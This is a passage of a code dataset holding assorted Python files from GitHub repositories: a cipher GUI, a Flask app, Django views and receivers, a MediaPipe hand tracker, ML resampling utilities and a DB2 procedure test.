entrys.salt.get().isascii():\n label_errors[\"text\"] = \"Slat wrong\"\n return\n\n if not entrys.rsa_first.get().isdigit():\n label_errors[\"text\"] = \"First RSA wrong\"\n return\n\n if not entrys.rsa_second.get().isdigit():\n label_errors[\"text\"] = \"Second RSA wrong\"\n return\n label_errors[\"text\"] = \"\"\n\n try:\n public = (int(entrys.rsa_first.get()), int(entrys.rsa_second.get()))\n salt = entrys.salt.get()\n text = entrys.value.get()\n temp = viziner.cipher(text, salt)\n label_num_with_salt_cipher.delete(1.0, tk.END)\n label_num_with_salt_cipher.insert(1.0, rsa.encrypt(public, temp))\n except Exception as e:\n label_errors[\"text\"] = str(e)\n\n\nbtn_generate = tk.Button(\n text=\"cipher\",\n command=button_click\n)\n\nlabel_num = tk.Label(\n text=\"Enter num\",\n fg=\"black\",\n bg=\"white\",\n width=width_m,\n)\n\nentrys.value = tk.Entry(\n width=width_m\n)\n\nlabel_salt = tk.Label(\n text=\"Enter a salt\",\n fg=\"black\",\n bg=\"white\",\n width=width_m,\n)\n\nentrys.salt = tk.Entry(\n width=width_m\n)\n\nlabel_rsa = tk.Label(\n text=\"Enter RSA public keys\",\n fg=\"black\",\n bg=\"white\",\n width=width_m,\n)\n\nentrys.rsa_first = tk.Entry(\n width=width_m\n)\n\nentrys.rsa_second = tk.Entry(\n width=width_m\n)\n\nlabel_num_with_salt_cipher_text = tk.Label(\n text=\"Num with salt cipher\",\n fg=\"black\",\n bg=\"white\",\n width=width_m,\n)\n\nlabel_num_with_salt_cipher = tk.Text(\n height=5,\n fg=\"black\",\n bg=\"white\",\n width=width_m\n)\n\nlabel_errors = tk.Label(\n height=1,\n width=width_m\n)\n\nconvert()\nwindow.mainloop()\n","repo_name":"nedoletoff/suaiIDEA","sub_path":"lab3/mod23.py","file_name":"mod23.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31265244614","text":"# If we list all the natural numbers below 10 that are multiples of 3 or 5,\n# we get 3, 5, 6 and 9. The sum of these multiples is 23.bit_length\n\n# Find the sum of all the multiples of 3 or 5 below 1000.bit_length\n\nadder = 0\ni = 0\nfor i in range(1000):\n if (i % 3 == 0):\n adder += i\n else:\n if (i % 5 == 0):\n adder += i\nprint(str(adder))\n","repo_name":"schaefer-dev/Project-Euler","sub_path":"python/problem001.py","file_name":"problem001.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35327010051","text":"import os\n\nfrom flask import Flask, jsonify, redirect\nfrom werkzeug.exceptions import HTTPException\n\n\ndef create_app(\n instance_path=None,\n static_folder='../frontend/build'\n):\n app = Flask(__name__,\n instance_path=instance_path,\n static_url_path='/',\n static_folder=static_folder,\n instance_relative_config=True)\n\n # Apply API blueprints\n from labelling.notebook import api_files\n app.register_blueprint(api_files.bp)\n # app.register_blueprint(other_api.bp)\n\n @app.errorhandler(ValueError)\n def http_error_handler(error):\n return jsonify(code=400, message=str(error)), 400\n\n @app.errorhandler(HTTPException)\n def http_error_handler(error):\n return jsonify(code=error.code, message=error.description), error.code\n\n @app.route('/')\n def home():\n return redirect('/index.html', code=302)\n\n _init_temp_dir(app)\n return app\n\n\ndef _init_temp_dir(app):\n try:\n os.makedirs(app.instance_path)\n except OSError:\n pass\n\n","repo_name":"wanasit/labelling-notebook","sub_path":"labelling/notebook/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4488368501","text":"\"\"\"Test module to test the base downloader with a zip file case.\"\"\"\nfrom downloaders import BaseDownloader\n\n\ndef test_base_downloader_zip_case():\n \"\"\"Test the base downloader with a zip file case.\"\"\"\n root = \"tests/downloads\"\n urls = [\n \"https://github.com/LucaCappelletti94/downloaders/blob/main/tests/data/data.zip?raw=true\",\n ]\n downloader = BaseDownloader(\n target_directory=root,\n )\n downloader.download(urls)\n","repo_name":"LucaCappelletti94/downloaders","sub_path":"tests/test_base_downloader_zip_case.py","file_name":"test_base_downloader_zip_case.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"42724388958","text":"__AUTHOR__ = \"lambdalisue (lambdalisue@hashnote.net)\"\nimport logging\n\nfrom django.db.models.signals import pre_save\n\nfrom .conf import settings\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef pre_save_callback(sender, instance, **kwargs):\n from . import get_backend\n\n if (\n hasattr(instance._meta, \"app_label\")\n and \"%s.%s\" % (instance._meta.app_label, instance._meta.model_name)\n in settings.AUTHOR_IGNORE_MODELS\n ):\n return\n if not hasattr(instance, settings.AUTHOR_CREATED_BY_FIELD_NAME):\n return\n # get current user via author backend\n user = get_backend().get_user()\n if settings.AUTHOR_DO_NOT_UPDATE_WHILE_USER_IS_NONE and user is None:\n return\n if getattr(instance, settings.AUTHOR_CREATED_BY_FIELD_NAME) is None:\n setattr(instance, settings.AUTHOR_CREATED_BY_FIELD_NAME, user)\n if not getattr(\n instance, \"_change_updated_by\", True\n ): # User forbid to modify updated_by field\n return\n if hasattr(instance, settings.AUTHOR_UPDATED_BY_FIELD_NAME):\n setattr(instance, settings.AUTHOR_UPDATED_BY_FIELD_NAME, user)\n\n\ndef register():\n if settings.AUTHOR_MODELS:\n for model in settings.AUTHOR_MODELS:\n app_label, model = model.split(\".\", 1)\n from django.contrib.contenttypes.models import ContentType\n\n ct = ContentType.objects.get_by_natural_key(app_label, model)\n pre_save.connect(pre_save_callback, sender=ct.model_class())\n else:\n pre_save.connect(pre_save_callback)\n","repo_name":"lambdalisue/django-author","sub_path":"author/receivers.py","file_name":"receivers.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"53"} +{"seq_id":"3500503765","text":"import mediapipe as mp\r\nimport numpy as np\r\nimport cv2 as cv\r\nimport math\r\n\r\nclass HandDetector:\r\n def __init__(self, mode=False, maxHands=1, modelComplexity=1,\r\n detectionConf=0.5, trackingConf=0.5):\r\n #\r\n self.__mode = mode\r\n self.__maxHands = maxHands\r\n self.__modelComplexity = modelComplexity\r\n self.__detectionConf = detectionConf\r\n self.__trackingConf = trackingConf\r\n #\r\n self.mpDraw = mp.solutions.drawing_utils\r\n self.mpHands = mp.solutions.hands\r\n self.hands = self.mpHands.Hands(self.__mode, self.__maxHands, self.__modelComplexity,\r\n self.__detectionConf, self.__trackingConf)\r\n\r\n\r\n def __find_results(self, img):\r\n img = cv.cvtColor(img, cv.COLOR_BGR2RGB)\r\n img.flags.writeable = False\r\n self.results = self.hands.process(img)\r\n\r\n def draw_all_landmarks(self, img, jointColor=(0,0,0), lineColor=(255,255,255),\r\n jointThickness=2, lineThickness=1):\r\n self.__find_results(img)\r\n if self.results.multi_hand_landmarks:\r\n for hand in self.results.multi_hand_landmarks:\r\n self.mpDraw.draw_landmarks(img, hand, self.mpHands.HAND_CONNECTIONS,\r\n self.mpDraw.DrawingSpec(color=jointColor, thickness=jointThickness, circle_radius=4),\r\n self.mpDraw.DrawingSpec(color=lineColor, thickness=lineThickness, circle_radius=2))\r\n\r\n def locate_landmarks(self, img, flip=False, draw=False):\r\n self.__img = img # created a instance variable for future uses\r\n self.__flip = flip # created a instance variable for future uses\r\n\r\n h, w, _ = self.__img.shape\r\n final = []\r\n\r\n self.__find_results(img)\r\n\r\n if self.results.multi_hand_landmarks: # if it is not empty\r\n for handType, landmarks in zip(self.results.multi_handedness, self.results.multi_hand_landmarks):\r\n myHand = {} # will hold the landmarks and hand side (left or right)\r\n lmList = [] # will hold the coordinats(x,y,z) of landmarks\r\n\r\n # Calculating x,y,z positions of all landmarks\r\n for lm in landmarks.landmark:\r\n px, py, pz = int(lm.x * w), int(lm.y * h), int(lm.z * w * -1)\r\n lmList.append([px, py, pz])\r\n myHand[\"landmarks\"] = lmList\r\n\r\n # Calculating the hand side (left or right)\r\n if flip:\r\n if handType.classification[0].label == \"Right\":\r\n myHand[\"label\"] = \"R\"\r\n else:\r\n myHand[\"label\"] = \"L\"\r\n else:\r\n if handType.classification[0].label == \"Right\":\r\n myHand[\"label\"] = \"L\"\r\n else:\r\n myHand[\"label\"] = \"R\"\r\n\r\n final.append(myHand)\r\n return final\r\n\r\n def calculate_distance(self, p1, p2, draw=False):\r\n x1, y1 = p1[0], p1[1] # assigning starting point variables\r\n x2, y2 = p2[0], p2[1] # assigning end point variables\r\n length = math.hypot(x2 - x1, y2 - y1) # calculating lenght between points\r\n\r\n if draw:\r\n cv.circle(self.__img, (x1, y1), 10, (255, 255, 255), -1)\r\n cv.circle(self.__img, (x2, y2), 10, (255, 255, 255), -1)\r\n cv.line(self.__img, (x1, y1), (x2, y2), (0, 0, 0), 3)\r\n\r\n return length\r\n\r\n def hand_and_finger_positions(self, hand, mode=2):\r\n lmList = hand[\"landmarks\"]\r\n label = hand[\"label\"]\r\n\r\n fingerPos = [None,None,None,None,None]\r\n handPos = {\"FIST\":None, \"GRIP\":None}\r\n\r\n # For Thumb\r\n if self.__flip:\r\n if label == \"R\": sit0 = lmList[4][0] > lmList[2][0]\r\n elif label == \"L\": sit0 = lmList[4][0] < lmList[2][0]\r\n elif not self.__flip:\r\n if label == \"R\": sit0 = lmList[4][0] < lmList[2][0]\r\n elif label == \"L\": sit0 = lmList[4][0] > lmList[2][0]\r\n\r\n # Level 1\r\n sit1 = lmList[8][1] > lmList[7][1]\r\n sit2 = lmList[12][1] > lmList[11][1]\r\n sit3 = lmList[16][1] > lmList[13][1]\r\n sit4 = lmList[20][1] > lmList[19][1]\r\n # Level 2\r\n sit5 = lmList[8][1] > lmList[6][1]\r\n sit6 = lmList[12][1] > lmList[10][1]\r\n sit7 = lmList[16][1] > lmList[14][1]\r\n sit8 = lmList[20][1] > lmList[18][1]\r\n # Level 3\r\n sit9 = lmList[8][1] > lmList[5][1]\r\n sit10 = lmList[12][1] > lmList[9][1]\r\n sit11 = lmList[16][1] > lmList[13][1]\r\n sit12 = lmList[20][1] > lmList[17][1]\r\n\r\n finger0_down = sit0\r\n finger1_down = sit1 and sit5\r\n finger2_down = sit2 and sit6\r\n finger3_down = sit3 and sit7\r\n finger4_down = sit4 and sit8\r\n\r\n finger0_up = not finger0_down\r\n finger1_up = not finger1_down\r\n finger2_up = not finger2_down\r\n finger3_up = not finger3_down\r\n finger4_up = not finger4_down\r\n\r\n if finger0_up: fingerPos[0] = 1\r\n elif finger0_down: fingerPos[0] = 0\r\n if finger1_up: fingerPos[1] = 1\r\n elif finger1_down: fingerPos[1] = 0\r\n if finger2_up: fingerPos[2] = 1\r\n elif finger2_down: fingerPos[2] = 0\r\n if finger3_up: fingerPos[3] = 1\r\n elif finger3_down: fingerPos[3] = 0\r\n if finger4_up: fingerPos[4] = 1\r\n elif finger4_down: fingerPos[4] = 0\r\n\r\n if sit0 and sit9 and sit10 and sit11 and sit12: handPos[\"FIST\"] = True\r\n else: handPos[\"FIST\"] = False\r\n\r\n return fingerPos, handPos\r\n\r\n\r\n","repo_name":"informaticacba/Medipipe-Projects","sub_path":"Hand Tracking/Hand_Tracking_Module.py","file_name":"Hand_Tracking_Module.py","file_ext":"py","file_size_in_byte":5735,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37100166547","text":"import sys\nimport argparse\n\n# Simply prints the content of the file to the console\ndef print_file_content(file):\n for line in file:\n print(line.rstrip())\n\ndef helper(output_file, *lines):\n with open(output_file, \"w\") as file_object:\n for line in lines:\n if type(line) is list:\n for element in line:\n if not element.endswith(\"\\n\"):\n file_object.write(element + \"\\n\")\n else:\n file_object.write(element)\n else:\n file_object.write(line)\n\n# Writes a list of strings to the output_file.\ndef write_list_to_file(output_file,lst):\n with open(output_file, \"w\") as file_object:\n for line in lst:\n file_object.write(line)\n\n# Reads an entire file to a list of strings.\ndef read_file(input_file):\n with open(input_file) as file_object:\n contents = file_object.readlines()\n return(contents)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"A Program that reads a file from CLI and writes it to the console and an output-file\")\n parser.add_argument('--output',help=\"Name of the file to which the output will be written to.\")\n parser.add_argument('--file', default=\"input.txt\", help=\"Name of the file which should be opend.\")\n args, unknown = parser.parse_known_args()\n file = read_file(args.file)\n if(args.output == None):\n print_file_content(file)\n for element in unknown:\n print(element + \"\\n\")\n else:\n helper(args.output, file, unknown)","repo_name":"Paepke-cph/PythonNotebooks","sub_path":"week2/02-Exercise-1.py","file_name":"02-Exercise-1.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11408474246","text":"from django.shortcuts import render, redirect\nfrom .models import Order, Product\n\ndef index(request):\n context = {\n \"all_products\": Product.objects.all()\n }\n return render(request, \"store/index.html\", context)\n\ndef order(request):\n price_from_form = Product.objects.get(id = request.POST['product_id']).price\n quantity_from_form = int(request.POST[\"quantity\"])\n total_charge = quantity_from_form * price_from_form\n order = Order.objects.create(quantity_ordered=quantity_from_form, total_price=total_charge)\n return redirect(f'/checkout/{order.id}')\n\ndef checkout(request, order_id):\n order = Order.objects.get(id=order_id)\n all_orders = Order.objects.all()\n\n all_orders_price = 0\n all_orders_total_quantity = 0\n\n for order in all_orders:\n all_orders_price += order.total_price\n all_orders_total_quantity += order.quantity_ordered\n\n context = {\n 'quantity' : order.quantity_ordered,\n 'charged' : order.total_price,\n 'all_orders_price' : all_orders_price,\n 'all_orders_total_quantity' : all_orders_total_quantity\n }\n return render(request, \"store/checkout.html\", context)","repo_name":"tringakrasniqi/amadon","sub_path":"apps/poorly_coded_store/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24031301931","text":"\"\"\"\nA package that carry miscellaneous utilities.\n\"\"\"\n# standard imports\nfrom pathlib import PurePath\nimport logging\nimport os\n\n# DS imports\nimport pandas as pd\nimport numpy as np\n\n# Third-Party imports\nfrom scipy.stats import spearmanr, pearsonr\nfrom sklearn.preprocessing import MinMaxScaler\nimport imblearn.under_sampling as uns\n\n# imblearn imports\nfrom imblearn.over_sampling import SMOTE, BorderlineSMOTE, SVMSMOTE, ADASYN\nfrom imblearn.combine import SMOTETomek, SMOTEENN\n\n# feature selectors\nfrom boruta import BorutaPy\nfrom sklearn.feature_selection import SelectKBest\nfrom sklearn.feature_selection import f_regression, RFE\nfrom sklearn.tree import DecisionTreeClassifier\n\nfrom sklearn.feature_selection import chi2\n\n# models\nfrom sklearn.ensemble import RandomForestRegressor\n\n\ndef calc_correlations(\n df, target, output_filepath=\"results/correlations\", verbose=False\n):\n \"\"\"\n Calculates Pearson and Spearman correlations per target and dumps it in a csv file.\n :param df: Df with data\n :param target: target variable\n :param output_filepath: output file path\n :param verbose: verbosity of function\n \"\"\"\n corr_pear = []\n corr_spear = []\n for i in range(len(df.columns)):\n pear, _ = pearsonr(df[df.columns[i]], df[df.columns[0]])\n corr_pear.append(pear)\n spear, _ = spearmanr(df[df.columns[i]], df[df.columns[0]])\n corr_spear.append(spear)\n df_corr = pd.DataFrame(\n list(zip(df.columns, corr_pear, corr_spear)),\n columns=[\"col\", \"pearson_corr\", \"spearman_corr\"],\n )\n if verbose:\n print(df_corr.sort_values(\"pearson_corr\", ascending=False))\n print(df_corr.sort_values(\"spearman_corr\", ascending=False))\n\n file_name = \"_Correlations\" + str(target) + \".csv\"\n file_path = PurePath(output_filepath)\n df_corr.to_csv(file_path.joinpath(file_name))\n\n\n# helper function to calculate the age of a person\ndef calculate_age(born, ref_date='2019-09-14'):\n \"\"\"\n Helper Function to calculate the age.\n \"\"\"\n born = pd.to_datetime(born)\n today = (\n datetime.strptime(ref_date, '%Y-%m-%d')\n if ref_date is not None\n else pd.to_datetime(\"today\")\n )\n return (today - born) / np.timedelta64(1, \"Y\")\n\n\ndef binning(df, col, bins=None, labels=None, verbose=False):\n \"\"\"\n Bins a given column from a dataframe\n :param df: Datframe\n :param col: column to be binned\n :param labels: label of bins\n :param bins: bins\n :param verbose: verbosity\n :return:\n \"\"\"\n if labels is None:\n labels = [0, 1, 2]\n if bins is None:\n bins = [0, 3, 10, 12]\n df[col] = pd.cut(x=df[col], bins=bins, labels=labels)\n if verbose:\n print(df[\"col\"].value_counts())\n return df\n\n\ndef df_to_csv(df, directory, file_name):\n \"\"\"\n Dumps a pandas DF to csv. Only works if directory is present in the current working directory.\n :param df: DF to be dumped\n :param directory: directory to dump in to\n :param file_name: file name\n \"\"\"\n directory = PurePath(directory)\n file_path = directory.joinpath(file_name)\n try:\n os.mkdir(directory)\n except FileExistsError:\n pass\n df.to_csv(file_path)\n logging.info(\"{} was dumped on disc.\".format(file_path))\n\ndef _RFE(X,y,no_features = 10):\n '''\n\n :param X: input test data\n :param y: input test data target\n :param no_features: number of features to select\n :return: list of features selected\n '''\n selector = RFE(estimator=DecisionTreeClassifier(), n_features_to_select=no_features)\n X = selector.fit(X,y)\n features = list(X.support_)\n return features\n\n\n# Sampling Methods\n# TODO: Finish refactoring sampling methods\ndef _SMOTE(seed, X, y, target, k_neighbors=3):\n \"\"\"\n Oversampling - SMOTE - Synthetic Minority Over-sampling Technique\n :param seed:\n :param X:\n :param y:\n :param target:\n :param k_neighbors:\n :return:\n \"\"\"\n\n # TODO: Marius: Should the original frame be concatenated with the new frames?\n smote = SMOTE(k_neighbors=k_neighbors, random_state=seed) # sampling_strategy=0.8\n X_smote, y_smote = smote.fit_resample(X, y)\n\n X_smote = pd.DataFrame(X_smote, columns=X.columns)\n y_smote = pd.DataFrame(y_smote, columns=[target])\n\n pos_before = y.sum()\n pos_after = y_smote.sum()\n\n logging.info(\n \"Observations before applying SMOTE: {} and after applying SMOTE {}\".format(\n X.shape[0], X_smote.shape[0]\n )\n )\n logging.info(\n \"Number positives before/after SMOTE: {}/{}.\".format(pos_before, pos_after)\n )\n\n return X_smote, y_smote\n\n\ndef _SMOTE_Border(self):\n # Oversampling - SMOTE - Synthetic Minority Over-sampling Technique\n\n print(\"before SMOTE df\", self.x_train.shape)\n smote = BorderlineSMOTE(\n k_neighbors=5, m_neighbors=5, random_state=self.seed\n ) # sampling_strategy=0.8\n self.X_train_smote, self.y_train_smote = smote.fit_sample(\n self.x_train, self.y_train\n )\n print(\"X_train_SMOTE:\\n\", self.X_train_smote[1])\n\n self.x_train = pd.DataFrame(self.X_train_smote, columns=self.x_train.columns)\n self.y_train = pd.DataFrame(\n self.y_train_smote, columns=[\"Local Relapse Y(1) /N(0)\"]\n )\n\n print(\"len smote: \\n\", len(self.X_train_smote))\n print(\"len new x_train: \\n\", len(self.x_train))\n\n number_pos_x = self.y_train.loc[self.y_train[\"Local Relapse Y(1) /N(0)\"] == 1]\n print(\"number positive responses y_train:\\n\", len(number_pos_x))\n\n\ndef _SMOTE_SVM(self):\n # Oversampling - SMOTE - Synthetic Minority Over-sampling Technique\n # print('before SMOTE df', self.x_train)\n print(\"before SMOTE df\", self.x_train.shape)\n smote = SVMSMOTE(\n k_neighbors=5, m_neighbors=5, random_state=self.seed\n ) # sampling_strategy=0.8\n self.X_train_smote, self.y_train_smote = smote.fit_sample(\n self.x_train, self.y_train\n )\n print(\"X_train_SMOTE:\\n\", self.X_train_smote[1])\n\n self.x_train = pd.DataFrame(self.X_train_smote, columns=self.x_train.columns)\n self.y_train = pd.DataFrame(\n self.y_train_smote, columns=[\"Local Relapse Y(1) /N(0)\"]\n )\n\n # print('len smote: \\n', len(self.X_train_smote))\n print(\"len new x_train after smote: \\n\", len(self.x_train))\n\n number_pos_x = self.y_train.loc[self.y_train[\"Local Relapse Y(1) /N(0)\"] == 1]\n print(\"number positive responses y_train:\\n\", len(number_pos_x))\n\n\ndef _SMOTETomek(self):\n \"\"\"Tomek links can be used as an under-sampling method or as a data cleaning method.\n Tomek links to the over-sampled training set as a data cleaning method.\n Thus, instead of removing only the majority class examples that form Tomek links, examples from both classes are removed\"\"\"\n smt = SMOTETomek(random_state=self.seed)\n self.X_train_smote, self.y_train_smote = smt.fit_sample(self.x_train, self.y_train)\n print(\"X_train_SMOTE:\\n\", self.X_train_smote[1])\n\n self.x_train = pd.DataFrame(self.X_train_smote, columns=self.x_train.columns)\n self.y_train = pd.DataFrame(\n self.y_train_smote, columns=[\"Local Relapse Y(1) /N(0)\"]\n )\n\n print(\"len smote: \\n\", len(self.X_train_smote))\n print(\"len new x_train: \\n\", len(self.x_train))\n\n number_pos_x = self.y_train.loc[self.y_train[\"Local Relapse Y(1) /N(0)\"] == 1]\n print(\"number positive responses y_train:\\n\", len(number_pos_x))\n\n\ndef _ANASYN(self):\n \"\"\"ADAptive SYNthetic (ADASYN) is based on the idea of\n adaptively generating minority data samples according to their distributions using K nearest neighbor.\n The algorithm adaptively updates the distribution and\n there are no assumptions made for the underlying distribution of the data.\"\"\"\n print(\"before: \", len(self.x_train))\n resampler = uns.InstanceHardnessThreshold(\n sampling_strategy=0.2, random_state=self.seed\n )\n self.X_train_smote2, self.y_train_smote2 = resampler.fit_resample(\n self.x_train, self.y_train\n )\n self.x_train = pd.DataFrame(self.X_train_smote2, columns=self.x_train.columns)\n self.y_train = pd.DataFrame(\n self.y_train_smote2, columns=[\"Local Relapse Y(1) /N(0)\"]\n )\n print(\"after: \", len(self.x_train))\n\n adasyn = ADASYN(random_state=self.seed)\n self.X_train_smote, self.y_train_smote = adasyn.fit_sample(\n self.x_train, self.y_train\n )\n print(\"X_train_SMOTE:\\n\", self.X_train_smote[1])\n\n self.x_train = pd.DataFrame(self.X_train_smote, columns=self.x_train.columns)\n self.y_train = pd.DataFrame(\n self.y_train_smote, columns=[\"Local Relapse Y(1) /N(0)\"]\n )\n\n print(\"len smote: \\n\", len(self.X_train_smote))\n print(\"len new x_train: \\n\", len(self.x_train))\n\n number_pos_x = self.y_train.loc[self.y_train[\"Local Relapse Y(1) /N(0)\"] == 1]\n print(\"number positive responses y_train:\\n\", len(number_pos_x))\n\n\n### Feature Selectors\n\n\ndef select_KBest(self, score_func=f_regression, k=10):\n\n print(\"Pre feature selection shape X_Train\", self.x_train.shape)\n print(\"Pre feature selection shape Y_Train\", self.y_train.shape)\n feat_selector = SelectKBest(score_func=score_func, k=k)\n selector = feat_selector.fit(\n np.asarray(self.x_train), np.asarray(self.y_train.values)\n )\n\n # feat_scores = pd.DataFrame()\n self.feat_scores[\"Score\"] = selector.scores_\n self.feat_scores[\"Pvalue\"] = selector.pvalues_\n self.feat_scores[\"Support\"] = selector.get_support()\n self.feat_scores[\"Attribute\"] = self.x_train.columns\n\n self.feat_scores = self.feat_scores.sort_values(\"Score\", ascending=False, axis=0)\n # print(sorted_df)\n self.feat_scores = self.feat_scores.iloc[\n :k, :\n ] # get selected number of rows from ranking\n sorted_columns = self.feat_scores[\"Attribute\"].values # get column names\n\n print(\"Ranked input features:\\n\", self.feat_scores)\n\n # self.new_df = self.df[sorted_columns] #create new DF with selected rows - created in def __init__()\n # self.new_df[target] = self.df[target].values # add 'Response' column to new dataframe\n # print(\"New DataFrame Columns:\\n\", self.new_df.columns)\n # print('Length of new_df: \\n', len(self.new_df))\n # print(self.new_df.dtypes)\n\n self.x_train = self.x_train[sorted_columns]\n self.x_test = self.x_test[sorted_columns]\n\n print(\"New Columns:\\n\", self.x_train.columns)\n # print(\"New x_test Columns:\\n\", self.x_train.columns)\n\n print(\"Length of x_train: \\n\", len(self.x_train))\n print(\"Length of x_test: \\n\", len(self.x_test))\n\n\ndef boruta_selection(x_train, y_train, seed):\n \"\"\"Kursa, M., Rudnicki, W., “Feature, Selection\n with the Boruta Package” Journal of Statistical Software, Vol.36, Issue 11, Sep 2010\"\"\"\n\n # define random forest classifier, with utilising all cores and\n # sampling in proportion to y labels\n rf = RandomForestRegressor(n_jobs=-1, oob_score=True)\n\n feat_selector = BorutaPy(\n rf,\n n_estimators=\"auto\",\n max_iter=100,\n alpha=0.05,\n verbose=2,\n random_state=seed,\n )\n\n # find all relevant features - 5 features should be selected\n # print(self.x_train.head())\n # print(self.y_train.head())\n selector = feat_selector.fit(np.asarray(x_train), np.asarray(y_train))\n # print(\"selector\", selector)\n # print(selector.support_)\n # print(selector.ranking_)\n # self.x_train = self.x_train.loc[:, feat_selector.support_].astype(\"float\")\n # self.x_test = self.x_test.loc[:, feat_selector.support_].astype(\"float\")\n\n # self.features[target] = self.y_train['Response']\n # print(\"New DF Shape: \", self.x_train.shape)\n # print(self.x_train)\n # self.x_train = self.features\n # print(\"New DataFrame Columns:\\n\", self.x_train.columns)\n # print('Length of new_df: \\n', len(self.x_train))\n # print(self.x_train.dtypes)\n return selector.support_\n\n\ndef _ADABoost(self):\n\n boost = AdaBoostRegressor(\n base_estimator=None,\n learning_rate=0.05,\n loss=\"square\",\n n_estimators=50,\n random_state=self.seed,\n )\n\n boost.fit(self.x_train, self.y_train)\n\n # Use the forest's predict method on the test data\n predictions = boost.predict(self.x_test)\n # Calculate the absolute errors\n errors = abs(predictions - self.y_test)\n # Print out the mean absolute error (mae)\n print(\"Mean Absolute Error:\", round(np.mean(errors), 2))\n\n\ndef scale_floats(df):\n # hacky way to get all columns that contain only floats\n tmp_cols = [key for key, value in df.dtypes.items() if value.kind is \"f\"]\n tmp_df = df[tmp_cols]\n scaler = MinMaxScaler()\n df[tmp_cols] = scaler.fit_transform(tmp_df)\n return df\n\n\ndef scale_y(s):\n scaler = MinMaxScaler()\n return scaler.fit_transform(s)","repo_name":"mariusloewe/master_thesis","sub_path":"src/helper/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":12719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13154811547","text":"from bitcoincoin.models.bank import Bank, BankUser, BankJoinDemand\n\n\ndef get_banks():\n banks = Bank.select()\n return [bank.get_small_data() for bank in banks]\n\n\ndef get_bank(bank_id, user_id=None):\n bank = Bank.get_or_none(id=bank_id)\n if bank is not None:\n data = bank.get_data()\n if user_id is not None:\n user = BankUser.get_or_none(bank=bank, user=user_id)\n if user is not None and user.rank == 'Admin':\n data['demands'] = [bjd.get_small_data() for bjd in bank.demands]\n return data\n\n\ndef create_bank(name: str, symbol: str, admin: int):\n bank = Bank.create(name=name, symbol=symbol)\n admin_user = BankUser.create(bank=bank, user=admin, rank='Admin')\n return bank.get_data()\n\n\ndef join_bank(bank_id: int, user_id: int, rank: str):\n bank = Bank.get(id=bank_id)\n join_demand = BankJoinDemand.get_or_none(bank=bank, user_id=user_id)\n user = BankUser.create(bank=bank, user=user_id, rank=rank)\n join_demand.delete_instance()\n\n return bank.get_data()\n\n\ndef quit_bank(bank_id: int, user_id: int):\n user = BankUser.get_or_none(bank=bank_id, user=user_id)\n if user is None:\n return False\n\n user.delete_instance()\n return True\n\n\ndef ask_to_join_bank(bank_id: int, user_id: int):\n bank = Bank.get(id=bank_id)\n join_demand, created = BankJoinDemand.get_or_create(bank=bank, user=user_id)\n return created\n","repo_name":"fuegoio/bitcoincoin","sub_path":"back/bitcoincoin/controllers/banks.py","file_name":"banks.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"13884783331","text":"\"\"\"test SP Iterator\r\n \r\n\"\"\"\r\nfrom __future__ import absolute_import\r\n\r\nimport sys\r\nimport ibm_db\r\n\r\nfrom . import CommonTestCase\r\nfrom utils.logconfig import mylog\r\nfrom multiprocessing import Value\r\nfrom ctypes import c_bool\r\n\r\nexecute_once = Value(c_bool,False)\r\n\r\n__all__ = ['Iterator']\r\nclass Iterator(CommonTestCase):\r\n \"\"\"Iterator\"\"\"\r\n\r\n def __init__(self, test_name, extra_arg=None):\r\n super(Iterator, self).__init__(test_name, extra_arg)\r\n\r\n def runTest(self):\r\n super(Iterator, self).runTest()\r\n if self.mDb2_Cli is None:\r\n return\r\n with execute_once.get_lock():\r\n if execute_once.value:\r\n mylog.debug(\"we already ran\")\r\n return\r\n execute_once.value = True\r\n self.test_register_iterator()\r\n self.test_run_iterator()\r\n\r\n def test_register_iterator(self):\r\n \"\"\"SET SERVEROUTPUT ON@\r\n\r\n \"\"\"\r\n sql_str = \"\"\"\r\nCREATE OR REPLACE PROCEDURE ITERATOR()\r\n LANGUAGE SQL\r\n BEGIN\r\n DECLARE v_deptno CHAR(3); \r\n DECLARE v_new_dept CHAR(3);\r\n DECLARE v_deptname VARCHAR(29); \r\n DECLARE v_admdept CHAR(3);\r\n DECLARE v_one_char CHAR(1);\r\n DECLARE v_99 CHAR(2);\r\n DECLARE at_end INTEGER DEFAULT 0;\r\n DECLARE not_found CONDITION FOR SQLSTATE '02000';\r\n\r\n DECLARE c1 CURSOR FOR \r\n SELECT \r\n deptno, \r\n deptname,\r\n admrdept\r\n FROM \r\n department \r\n ORDER BY \r\n deptno;\r\n DECLARE CONTINUE HANDLER \r\n FOR \r\n not_found \r\n SET \r\n at_end = 1;\r\n\r\n OPEN c1;\r\n\r\n ins_loop: LOOP\r\n\r\n FETCH c1 INTO v_deptno, v_deptname, v_admdept; \r\n\r\n IF at_end = 1 THEN\r\n LEAVE ins_loop;\r\n ELSEIF v_deptno = 'D11' THEN\r\n ITERATE ins_loop;\r\n END IF;\r\n set v_one_char= CHR(MOD(INT(RAND()*100),26)+65);\r\n set v_99 = CAST(MOD(INTEGER(RAND()*10000), 99) as VARCHAR(2));\r\n set v_new_dept = CONCAT(v_one_char, v_99);\r\n CALL 